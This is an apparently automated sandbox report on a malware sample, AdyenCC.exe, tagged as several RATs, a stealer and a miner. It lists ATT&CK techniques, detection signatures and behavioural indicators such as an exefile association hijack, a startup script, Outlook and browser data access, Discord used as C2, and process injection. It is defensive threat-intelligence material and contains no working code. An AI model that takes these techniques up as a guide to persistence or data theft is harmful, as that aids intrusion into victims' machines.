Malware Analysis Report

2024-08-06 12:40

Sample ID 240512-b7htcsdf87
Target AdyenCC.exe
SHA256 a83dd4e909952c0888c41722b8f562c81003b495184b7a8201dd23eab1860486
Tags
asyncrat neshta stealerium xmrig zgrat new collection evasion execution miner persistence rat spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a83dd4e909952c0888c41722b8f562c81003b495184b7a8201dd23eab1860486

Threat Level: Known bad

The file AdyenCC.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat neshta stealerium xmrig zgrat new collection evasion execution miner persistence rat spyware stealer upx

ZGRat

Detect Neshta payload

Stealerium

AsyncRat

Neshta

xmrig

Detect ZGRat V1

XMRig Miner payload

Creates new service(s)

Stops running service(s)

Executes dropped EXE

Checks computer location settings

UPX packed file

Reads user/profile data of web browsers

Drops startup file

Modifies system executable filetype association

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Command and Scripting Interpreter: PowerShell

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Delays execution with timeout.exe

outlook_office_path

Suspicious use of WriteProcessMemory

Kills process with taskkill

Modifies registry class

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

outlook_win_path

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
System Services
T1569
Service Execution
T1569.002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Event Triggered Execution
T1546
Change Default File Association
T1546.001
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Event Triggered Execution
T1546
Change Default File Association
T1546.001
Defense Evasion
TA0005
Impair Defenses
T1562
Modify Registry
T1112
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Email Collection
T1114
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Service Stop
T1489
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-12 01:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-12 01:47

Reported

2024-05-12 02:20

Platform

win10v2004-20240508-en

Max time kernel

1799s

Max time network

1801s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AdyenCC.exe"

Signatures

AsyncRat

rat asyncrat

Detect Neshta payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Neshta

persistence spyware neshta

Stealerium

stealer stealerium

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\jafryz.exe N/A
N/A N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A
N/A N/A C:\Windows\svchost.com N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A icanhazip.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2004 set thread context of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4720 set thread context of 3876 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 set thread context of 2588 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~3\HQCBGQ~1\ZKNGQR~1.EXE C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~4.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~2.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MI9C33~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\jafryz.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\jafryz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\jafryz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\jafryz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\jafryz.exe N/A
N/A N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe N/A
N/A N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4472 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\AdyenCC.exe C:\Windows\SysWOW64\wscript.exe
PID 4472 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\AdyenCC.exe C:\Windows\SysWOW64\wscript.exe
PID 4472 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\AdyenCC.exe C:\Windows\SysWOW64\wscript.exe
PID 3968 wrote to memory of 4176 N/A C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\cmd.exe
PID 3968 wrote to memory of 4176 N/A C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\cmd.exe
PID 3968 wrote to memory of 4176 N/A C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\cmd.exe
PID 4176 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4176 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4176 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4176 wrote to memory of 2004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4176 wrote to memory of 2004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4176 wrote to memory of 2004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2004 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2004 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2004 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2004 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2004 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2004 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2004 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2004 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4844 wrote to memory of 2952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4844 wrote to memory of 2952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4844 wrote to memory of 2952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 2952 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
